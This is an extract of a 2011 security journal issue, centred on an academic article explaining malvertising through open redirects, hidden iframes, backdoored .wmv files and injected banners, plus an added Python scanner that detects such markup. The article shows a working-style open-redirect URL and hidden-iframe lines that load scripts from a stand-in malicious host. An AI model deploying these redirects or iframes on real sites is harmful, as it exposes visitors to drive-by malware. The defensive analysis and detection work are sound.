This document discusses the emerging issue of "malvertising", where malicious actors exploit online advertising to spread malware. Specifically:
1) Malicious agents redirect users who click on advertisements to malicious sites that serve malware, taking advantage of the natural redirection built into online advertising.
2) Search engines' ties to advertising help malicious agents, as users expect redirects from search results and are less likely to be suspicious.
3) With no verification of advertisement redirects, attackers can easily hijack sponsored links and use drive-by downloads to distribute malware instead of sending traffic to the legitimate sites as intended. While advertisers pay for the ads, attackers exploit them to spread malware without authorization.
Malvertising - Exploiting Web Advertising | Elsevier Computer Fraud and Security Journal
FEATURE

which he describes as “a bit basic”, will make in and of themselves. While he says that the “unification of views” from disparate industry bodies can only be a good thing, he points out that their value to the industry is likely to remain limited “until and unless businesses [rather than individual practitioners] are made fully aware of their existence and accept and embrace them”.

“It’s a good starting point if only for debate such as this,” he says, “but it will be interesting to see the status of the principles in a year’s time.”

Ethics project

Meanwhile, another potential step on the road to professionalisation is the creation of an initiative entitled the Information Security Ethics Project, which is sponsored by and housed within the UK’s Institute of Information Security Professionals (IISP).

The idea behind the project came from the Institute’s general counsel, Robert Carolina, who is also a senior visiting fellow at Royal Holloway University’s information security group, where he teaches in its information security MSc programme.

In early 2009, Carolina wrote an article for Computer Weekly about the legality – or otherwise – of the actions of the BBC’s Click TV programme team when it created its own botnet for educational purposes by commandeering more than 21,000 computers around the world.

Carolina canvassed the opinions of a number of information security practitioners as to whether they considered the move right or wrong. The responses, which ranged from “it’s absolutely appalling and law enforcement should throw the book at them” to “they deserve to get an award” – which, incidentally, they later did – prompted him to explore what ethical guidance was currently available, most of which he found unhelpful.

As a result, as of early February this year, Carolina kicked off the first in a series of ethics workshops, made up of no more than 25 IISP members. “This is an area where people are crying out for guidance, especially in the private sector,” he says. “We want practitioners to have better information so that they feel less exposed and better informed to make hard decisions.”

Things are changing

The half-day discussion centred on a series of hypothetical case studies that were used to debate the right and wrong ways to respond in each scenario and, most importantly, why. The aim was to look for points of commonality and difference in individuals’ beliefs and approaches and to use those areas where opinion diverged as the basis for further discussion.

The next step will be to host an ongoing series of workshops over the next 12 months or so and to circulate reports based on the outcomes to members of the working group, although other individuals will be invited to join as appropriate.

“If this gains traction and popular support, we might be able to start abstracting out basic principles to describe what ethical practices are and maybe write them down as a rule set,” Carolina says. “But if we do that, it will only be published with highlighted case studies as you have to have examples and context. In my professional opinion, without that, it’s not much value.”

While such initiatives are, unfortunately, still rather fragmented in nature, what they would appear to suggest is that the information security industry is slowly starting to move down the path of becoming more professionalised. As Gillespie concludes: “Things are changing. There are lots of pockets of work being done and, while they’re not consistent or global, you can see a day when the industry will get there – although it’s a long road yet.”

About the author

Cath Everett is a freelance journalist who has been writing about business and technology issues since 1992. Her special areas of focus include information security, HR/management and skills issues, marketing and high-end software.
Malvertising – exploiting web advertising

Aditya K Sood, Richard J Enbody, Michigan State University

April 2011 Computer Fraud & Security

Online advertisements provide a convenient platform for spreading malware. Since ads provide a significant portion of revenue on the web, significant effort is put into attracting users to them. Malicious agents take advantage of this skillful attraction and then redirect users to malicious sites that serve malware.

Search engines’ intimate tie-in with advertising also assists malicious agents: significant effort goes into attracting users to particular sites from which users can be redirected. Of particular use to malicious agents is that redirection is built into online advertising, so the malicious user only needs to co-opt a redirection that is already taking place. As a bonus, the user expects a redirection to take place, so the redirection to a malicious site is less of a red flag.

Another feature of online advertising that can be co-opted by malicious agents is the dynamic delivery of ads. A standard approach is to provide HTML code snippets that are used in conjunction with normal websites in order to embed advertisements. For example, Doubleclick.net provides millions of ads that are served to different domains as dynamic content – that is, the content of advertisements can change dynamically based on user or content characteristics. Service Level Agreements (SLA) exist between ad distributor and website to define appropriate content, but they are neither designed for nor appropriate for applying effective security. In particular, it is hard to determine the integrity of content that is shared among different domains across the web.

The result is that online marketing has opened up new avenues for profit generation while at the same time providing a convenient platform for malware delivery. Malvertising growth is being assisted by the following:

• Malicious agents can register nearly any domain and can use it as a storage base for malware in order to conduct drive-by-download attacks by redirecting users to their malicious domains [1]. Generally, these types of domains do not comply with any types of security or privacy standards.
• Malicious agents can use different modes of malvertising infections in order to redirect traffic from malvertisements that are distributed across the World Wide Web. When a user clicks on a malvertisement, the traffic is redirected towards a malicious domain rather than the legitimate one.
• Generally, no verification check can be imposed on advertisements to detect whether the redirect occurs appropriately or not. This lack of verification results from the nature of the web-advertising model, which makes it difficult for a publisher to scrutinise web traffic related to ad delivery.
• Attackers can also tamper with sponsored links to distribute malicious executables directly into the system as part of a drive-by-download infection. Internet Explorer has been a popular target because of both its popularity and its ability to run custom exploits through ActiveX controls [8].

The irony is that advertisers pay the publishers for the advertisements while the attackers exploit those same ads to spread malware.

Figure 1: Registering a widget on a vulnerable advertising domain.

Malvertising modes

Most web malware is triggered through web injections that exploit vulnerabilities in web software and domains. Different modes of infection are used for injecting malicious advertisements into vulnerable domains. To appreciate the severity and prevalence of this class of attack, the Open Web Application Security Project (OWASP) recently placed unvalidated redirects and forwards in its 2010 ‘top 10’ list [2].

Malvertising with malicious widgets and redirection

The advent of Web 2.0 popularised widgets for use in advertising and traffic redirection [3]. However, flaws in the design of some web widgets pose high risks to domains using those widgets for advertising [4]. As mentioned above, the redirection can be co-opted by malicious users to redirect traffic to malicious sites.
12
Computer Fraud & Security April 2011
3. FEATURE
For example, we detected a widget vulnerability in a popular news publisher website. The normal procedure is for a user to register, which allows the publisher to render news from various popular channels and embed them into the user’s websites and blogs. However, because of flaws in the publisher’s system, it’s possible to redirect traffic.

In order to install the widget, the publishing domain requires certain steps to be performed by a user to facilitate the ability of the widget to include third-party content. Specifically:

• The widget can only be installed after registration. The user selects the widget code based on the target platform – such as blogger, MySpace etc – in which the widget is to be installed.
• Once the registration is complete, the publisher requires the user to log in to his or her website or blog so that widget installation can be completed. After installation, the publisher starts sending news and advertisements to the registered user website.
• After the widget is embedded in the user’s site, the user is able to receive random content from various content providers through a vulnerable advertising domain that acts as an intermediate service provider.

Figure 2: Installed widget.

For advertising purposes, the vulnerable publishing domain uses redirection links in order to advertise on the publisher’s website. However, web traffic can be easily redirected from where the widget is installed to any domain. This shows that inclusion of the widget in any random domain can result in traffic redirection from a vulnerable publisher’s website through advertising links. The attacker can exploit this scenario by performing three steps:

Step 1: The attacker registers as a legitimate user (in order to get a widget for inclusion in some domain) as shown in Figure 1. The widget is included in the same domain as shown in Figure 2.

Step 2: The attacker can activate the apparently dead vulnerability through hyperlinks by activating the URL from the vulnerable publishing domain as follows, where ‘outbrain.com’ is a vulnerable advertising domain and ‘xsstestingblog’ is a blog that serves malware:

http://outbrain.com/most-viewed.action?sourceUrl=http://www.xsstestingblog.blogspot.com

Step 3: Users who go to the widget thinking that they are entering the publisher’s site find themselves redirected to the attacker’s site. A successful attack can be seen as a response request mechanism in Figure 3.

This attack is the outcome of a design bug in the widget implementation. Attackers can exploit this scenario by generating malicious advertisements (using the publisher’s name) that are embedded with redirected URLs which exploit the design bug in the vulnerable publishing domain in order to execute redirection towards the malicious domain. This shows how a vulnerable advertising widget can be subverted by an attacker.

Hidden iframes are one way for attackers to hide the objects that are used for spreading malware. The concept of hidden infection is not new, but here we show a different variation. The HTTP specification includes the iframe to embed one web page into another. Iframes can be used to load dynamic content for advertising. This functionality of iframes can be exploited to trigger infections. Iframes are used extensively in order to bypass Same Origin Policy (SOP) and launch a Cross Domain Attack (CDA) [5,6]. Attackers can easily embed hidden iframes that serve malvertisements in order to spread malware while interacting with legitimate users. Usually, iframes are exploited using the following procedures for running malicious code:

1. Scripts in iframes are allowed to execute in the context of the browser process (the more powerful the context, the greater the vulnerability that can be exploited).
2. There is no specific security restriction on Active X object usage.
3. Browser redirection can be done easily through iframes.
4. Access to local objects is not restricted completely.

The hidden iframes used for malvertising are constructed as follows:

<iframe src="http://www.malicious.com/mal_ad.js" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

<iframe src="http://www.malicious.com/software_ad.js" width=0 height=0></iframe>
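As an added example that is not part of the article, the following Python scanner implements two publisher-side checks that the material above motivates: it flags a redirect parameter such as the sourceUrl in the Step 2 URL when it points to a host outside an allow-list, and it flags iframes shaped like the hidden ones shown above (tiny dimensions or hidden via CSS). The host names, the allow-list and the sample markup are constructed for illustration.

```python
# Scan third-party ad markup for open redirects and hidden iframes (added example;
# the host names, allow-list and sample markup are constructed, not from the article).
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Hosts a redirect parameter may legitimately point to (constructed allow-list).
ALLOWED_REDIRECT_HOSTS = {"www.publisher.example", "ads.publisher.example"}
# Parameter names that commonly carry a redirect target; 'sourceurl' is the article's.
REDIRECT_PARAMS = {"sourceurl", "url", "redirect", "next"}

def open_redirect_target(url):
    """Host an off-allow-list redirect parameter points to, or None (relative paths pass)."""
    for name, values in parse_qs(urlsplit(url).query).items():
        if name.lower() not in REDIRECT_PARAMS:
            continue
        for value in values:
            host = urlsplit(value).hostname  # also set for scheme-relative '//host/..'
            if host and host.lower() not in ALLOWED_REDIRECT_HOSTS:
                return host.lower()
    return None

def _px(value):
    # Width/height attribute as an int; a missing or non-numeric value counts as large.
    try:
        return int(str(value).strip().rstrip("px"))
    except ValueError:
        return 10 ** 6

class AdScanner(HTMLParser):
    # Collects (kind, url, detail) findings from ad markup, in document order.
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "iframe":
            reasons = []
            if _px(a.get("width")) <= 1 or _px(a.get("height")) <= 1:
                reasons.append("tiny size")
            style = a.get("style", "").replace(" ", "").lower()
            if "visibility:hidden" in style or "display:none" in style:
                reasons.append("hidden via CSS")
            if reasons:
                self.findings.append(("hidden-iframe", a.get("src", ""), ", ".join(reasons)))
        target = a.get("href") if tag == "a" else a.get("src")  # links and embedded loads
        host = open_redirect_target(target) if target else None
        if host:
            self.findings.append(("open-redirect", target, host))

def scan_ad_markup(markup):
    scanner = AdScanner()
    scanner.feed(markup)
    return scanner.findings

# Constructed sample: an open-redirect link, the two hidden-iframe shapes from the article, one ordinary banner.
SAMPLE_AD = """
<a href="http://widget-ads.example/most-viewed.action?sourceUrl=http://evil.example/">Most viewed</a>
<iframe src="http://malicious.example/mal_ad.js" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
<iframe src="http://malicious.example/software_ad.js" width=0 height=0></iframe>
<iframe src="https://ads.publisher.example/banner" width=300 height=250></iframe>
"""
```

Running scan_ad_markup(SAMPLE_AD) yields three findings: the open redirect to evil.example and the two hidden iframes; the 300x250 banner passes.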
In addition, attackers can hide their malicious purpose using Javascript obfuscation techniques to encode the malicious links. Iframes possess a default inherited flaw of defining a trust relationship between different domains that are communicating with each other. The trust relationship cannot be determined every time within different domains that are sharing content.

The inability to precisely determine trust is why it is very hard to restrict the content present in iframes and why it is executed in the context of the parent website. Attackers load malvertisements in iframes to run in the parent domain for inline infections so that the detection process becomes harder.

Figure 3: Victim browser successfully gets redirected to the malware domain.

Malvertising through infected Content Delivery Networks

A Content Delivery Network (CDN) is a third-party ad server that provides content to different domains across the web. CDNs are the preferred choice for attackers to spread malware by exploiting the CDN web servers – the attackers can simply let the servers assist in spreading the malware. Advertisements use Flash, Silverlight, pop-ups, Windows Media Player files and Javascript extensively. However, this is a grave concern because if a CDN server is exploited, the attacker can inject malicious code in the form of malvertisements and that code is widely distributed. There is a chain reaction because if a parent server is infected, the child nodes will automatically get infected, too. Corrupting a server that serves thousands of sites spreads the malvertisements broadly and often in a trusted manner.

We have identified Windows Media Player files being used in malvertising for spreading malware. An attacker can perform the following steps in order to design and inject malicious .wmv files as malvertisements:

Step 1: The attacker ‘backdoors’ the .wmv file using Windows Script Editor, with malicious code (as presented in Figure 4) that executes through Cross Site Scripting (XSS) attacks.

Step 2: The attacker injects this .wmv file in an iframe and injects the code in a vulnerable CDN domain. When this file is distributed across domains, it starts spreading the malicious XSS file and bypasses the Internet Explorer XSS filter as shown in Figure 5.

As you can see, CDNs have the potential to be a big problem with respect to web malware.

Figure 4: Designing a .wmv file backdoor.

Malvertising through malicious banners

Advertising banners are used extensively in order to spread infections [7]. Primarily, attackers exploit servers that host a number of websites on a single server – a common scenario. As above, attacking servers is an easy way to infect a large number of websites. In addition, since advertising banners are widespread, an attack through them will also be widespread. In this attack, the attackers exploit an XSS flaw or SQL injection vulnerability in websites hosted on the server in order to take full control. The attacker then uses two specific techniques to infect websites with malicious banners as follows:
• Attackers update the database with malicious iframes by exploiting SQL injections in order to trigger persistent infections.
• Attackers compromise the shared hosting server and use automated scripts to render malicious code on the main web page of different hosts.

When a user visits a specific website, malicious banners are displayed along with dynamic content. Click on the banner and the user is infected, or simply displaying the banner can lead to infection.

Figure 5: WMV file is spreading malicious VbScript file.

This trick can be used in conjunction with SEO poisoning in which an attacker coerces a search engine to visit malicious domains or hijacked websites that display malicious banners.

Solutions

• The design of web applications and widgets should be thoroughly verified before allowing their use in a production environment. The widget should be installed with appropriate access controls in order to avoid any rogue actions.
• The interface communication channel between an installed widget and a parent website should be monitored to catch the traffic redirection. Generally, the main website should not allow redirection in an open manner without restricted control.
• Appropriate configuration should be used in shared hosting environments. The servers should be audited regularly in order to detect any vulnerable hosts.
• A live malware monitoring system should be used for dedicated and shared hosting servers in order to trace malware infections at inception.
• Systems should be updated with the latest software and patches.

Conclusion

We’ve covered the essential dynamics of malvertising and the attack strategies used to distribute malicious advertisements across domains. Malvertisements are becoming one of the main sources of spreading web malware. One reason for their popularity is a dearth of appropriate security procedures for content sharing. For example, merely signing an SLA does not ensure security and integrity in a shared network. There is a pressing need for rigorous security policies and procedures to curb the risk of this type of infection. History indicates that it is impossible to get rid of malware infections completely, but continuous efforts can contribute towards enhancing the security of our networks.

About the authors

Aditya K Sood is a security researcher, consultant and PhD candidate at Michigan State University. He has worked in the security domain for Armorize, COSEINC and KPMG and founded SecNiche Security. He has been an active speaker at conferences such as RSA, Toorcon, Hacker Halted, TRISC, EuSecwest, XCON, OWASP AppSec, CERT-IN and has written content for HITB Ezine, ISSA, ISACA, Elsevier, Hakin9 and Usenix Login.

Dr Richard Enbody is an Associate Professor in the Department of Computer Science and Engineering, Michigan State University. He joined the faculty in 1987 after earning his PhD in Computer Science from the University of Minnesota. His research interests are in computer security, computer architecture, web-based distance education and parallel processing. He has two patents pending on hardware buffer-overflow protection, which will prevent most computer worms and viruses. He recently co-authored a CS1 Python book, The Practice of Computing using Python.

Resources

• Polychronakis, Michalis; Mavrommatis, Panayiotis; Provos, Niels. ‘Ghost Turns Zombie: Exploring the Life Cycle of Web-based Malware’. Accessed Mar 2011. <http://www.usenix.org/event/leet08/tech/full_papers/polychronakis/polychronakis.pdf>.
• Provos, Niels; McNamee, Dean; Mavrommatis, Panayiotis; Wang, Ke; Modadugu, Nagendra. ‘The Ghost in the Browser: Analysis of Web-based Malware’. Accessed Mar 2011. <http://www.usenix.org/event/hotbots07/tech/full_papers/provos/provos.pdf>.
• Ford, Sean; Cova, Marco; Kruegel, Christopher; Vigna, Giovanni. ‘Analyzing and Detecting Malicious Flash Advertisements’. Accessed Mar 2011. <http://www.cs.ucsb.edu/~chris/research/doc/acsac09_flash.pdf>.
• ‘Some 1.3 million malicious ads served daily’. SC Magazine, 18 May 2010. Accessed Mar 2011. <http://www.scmagazineus.com/report-some-13-million-malicious-ads-served-daily/article/170414/>.
• ‘Pay Per Click’. Wikipedia. Accessed Mar 2011. <http://en.wikipedia.org/wiki/Pay_per_click>.
• ‘Active X Controls’. Microsoft. Accessed Mar 2011. <http://msdn.microsoft.com/en-us/library/aa751968%28v=vs.85%29.aspx>.
• Danchev, Dancho. ‘MSN Norway serving Flash exploits through malvertising’. ZDNet, 27 Aug 2008. Accessed Mar 2011. <http://www.zdnet.com/blog/security/msn-norway-serving-flash-exploits-through-malvertising/1815>.
• ‘SEO Poisoning Attacks Growing’. Security Focus, 12 Mar 2008. Accessed Mar 2011. <http://www.securityfocus.com/brief/701>.

References

1. Cova, M; Kruegel, C; Vigna, G. ‘Detection and Analysis of Drive-by-Download Attacks and Malicious JavaScript Code’. In Proceedings of World Wide Web Conference, 2010.
2. OWASP Top 10 Attack Vectors 2010. Accessed Mar 2011. <http://www.owasp.org/index.php/Top_10_2010-Main>.
3. Nations, Daniel. ‘What’s the Difference Between a Widget and a Gadget?’. About.com Web Trends. Accessed Mar 2011. <http://webtrends.about.com/od/widgets/a/widget-gadget.htm>.
4. Sood, AK. ‘Open Redirect Wreck Off’. HITB EZine. Accessed Mar 2011. <http://magazine.hitb.org/issues/HITB-Ezine-Issue-004.pdf>.
5. ‘Same Origin Policy’. W3C. Accessed Mar 2011. <http://www.w3.org/Security/wiki/Same_Origin_Policy>.
6. ‘Client-Side Cross-Domain Security’. Microsoft. Accessed Mar 2011. <http://msdn.microsoft.com/en-us/library/cc709423%28v=vs.85%29.aspx>.
7. ‘Content Delivery and Distribution Services’. Web Caching. Accessed Mar 2011. <http://www.web-caching.com/cdns.html>.
The UK fraud landscape for financial services

Duncan Ash, SAS UK

Fraud in the financial services industry is a topic that constantly makes headlines, but is the situation really as dire as the media would have us believe? Well, according to the recent statistics from the National Fraud Authority (NFA), released 27 January 2011, fraud is costing the UK over £38bn a year. In particular, the financial services industry recorded the highest loss to fraudsters at £3.6bn. However, on a more positive note this actually represented a slight decrease on the 2010 Annual Fraud Indicator figure of £3.8bn due to improved fraud prevention methods involving plastic card fraud (£440m) and cheque fraud (£30m).

Reducing levels of card fraud in particular has been cited as a success story in the fight against fraudsters, with the latest figures from The UK Cards Association (6 October 2010) revealing that total fraud losses on UK cards fell to £186.8m between January and June 2010 – a 20% reduction compared with losses in the first half of 2009. This figure represented the lowest half-year total for 10 years, and the reduction was attributed to the success of a number of banking industry initiatives. For instance, the increasing roll-out of chip and PIN in the UK and abroad, a greater number of sign-ups to MasterCard SecureCode and Verified by Visa by cardholders and retailers, and the increasing use of fraud detection tools by banks and retailers have all contributed to the decline in losses.

A moving target

Unfortunately, criminals tend to be opportunistic and are always on the lookout for the next weak link in the system that can be exploited. According to Financial Fraud Action UK (12 January 2010), more than 50% of regular UK Internet users (41.4 million) are now banking online. This substantial growth in popularity of the online channel in recent years, both in terms of Internet shopping and online banking, has led to an increased number of attacks, in particular through phishing and financial malware. The NFA figures show that online banking has seen an increase of 14% (£60m) in fraud losses compared with the previous year. As such, the sector must continue to invest in anti-fraud systems and solutions to help stay one step ahead of the criminals.

However, because of the great variation between the security levels of online sites and the increased measures that merchants can take to protect themselves, there is a growing acceptance in the banking industry that not all fraud in the online channel can be conquered. Instead, the industry is positioning itself to pick and choose its battles, ensuring that damage can be limited and consumer confidence left intact.

Moreover, the latest Fraudscape report from CIFAS, the UK’s fraud prevention service, issued in March 2011, depicts the continuing migration of fraud to new sectors: fewer bank accounts and plastic cards were targeted by fraudsters (15% and 37% decreases respectively) only to be offset